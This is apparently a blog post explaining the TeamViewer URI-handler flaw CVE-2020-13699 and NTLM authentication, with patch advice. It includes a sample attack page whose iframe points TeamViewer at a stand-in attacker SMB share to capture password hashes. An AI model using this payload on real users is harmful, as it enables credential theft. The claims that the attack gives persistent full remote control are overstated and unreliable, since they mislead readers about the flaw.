Teamviewer is a popular software application for remote connection, desktop sharing has recently unveiled that a new vulnerability or flaw that allows hacker to steal system password remotely and that too with ease.
The company recently revealed a new version which has patch for a severe new vulnerability CVE 2020-13699 and released an official statement for it too. So if you have teamviewer installed on your systems make sure you update it to the newest version available.
What new Teamviewer flaw is?
This new vulnerability was first discovered by Jeffrey Hofmann a security researcher from Praetorian, he said that the vulnerability resides in teamviewer in the way the application quotes its custom URI handlers, this allows the hacker or attacker force the application to relay an NTLM Authentication request on the attacker controlled system.
What is NTLM Authentication?
Windows Challenge/Response (NTLM) is the authentication protocol used on networks that include systems running the Windows operating system and on stand-alone systems. NTLM Credentials are based on the data obtained during progressive login process which includes following things:-
- A Domain name
- A Username
- One way hash of the user password
In a usual login process what happens is whenever you login, your credentials are matched with the credentials in the database over a secured an encrypted channel. Once the credentials are matched you will get access to the account or otherwise you will meet with an error.
However NTLM Authentication process is slightly different.
In NTLM authentication an encrypted challenge or response protocol is used to authenticate the user without sending the data over the wire in an encrypted connection. So basically, instead the system requesting the username and password for authentication like it happens in a usual login, here the system which is requesting the authentication must prove that it has access to the secured NTLM credentials by performing a complex calculation.
For more detailed information NTLM authentication you can read the official explanation done by Microsoft – Microsoft NTLM – Win32 Apps.
How Teamviewer vulnerability/flaw works?
Earlier we mentioned that an attacker can quote the application’s URI handlers and force the application to relay an NTLM authentication request on the attacker’s system that meant – An attacker can easily utilize the Teamviewer’s inbuilt URI scheme from a web-page to trick the application installed on the victim’s computer system into initiating a connection with an attacker owned system using the SMB Share.
Take this code as an example :-
<Doctype> <html lang="eng"> <head> <meta charset="utf-8"> <title>Demo Page</title> <meta name="page_name" content="Demo Page"> <meta name="author" content="attacker"> <link href="style.css" rel="stylesheet"> </head> <body> <iframe src="teamviewer10: --play" \\attacker-IP-address\share\fakesomething.tvs"></iframe> </body> </html>
Consider this example of a “Fake web page” which is designed by the attacker, now the attacker on the one side has to only trick the victim on the other side so he can access this fake web page. Once the web page is accessed by the victim the code that is in the “iframe” will trigger the windows desktop client of teamviewer on victim’s computer and it will be launched automatically, this will give an open access to the attacker.
So even if the victim closes the teamviewer, the access still remains intact as the hidden process keeps running in the background, thus allowing the attacker to take remote access to the victim’s computer without any need for his user account authentication.
In other words a hacker can take full control of victim’s computer system easily.
The trigger access can leak system’s username, and NTLMv2 hashed version of the password to the attackers, which can be used to access victim’s computer system and even network resources.
This vulnerability is categorized as:-
Product: TeamViewer Windows Desktop Application Developer: TeamViewer GmbH Vulnerability: Unquoted URI handler Affected Versions: Versions < 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3 This affects the URI handlers teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1. This issue was remediated by quoting the parameters passed by the aforementioned URI handlers e.g. URL:teamviewer10 Protocol "C:\Program Files (x86)\TeamViewer\TeamViewer.exe" "%1"
Source – Jeffrey Hofmann
Thankfully, teamviewer has patched the vulnerability on time, so its advisable to update the application installed on your computer system with latest one. Though this is a high risk vulnerability it is not being exploited repeatedly, however as this application is hugely popular and millions of user base that’s why it often becomes a sweet target for attackers.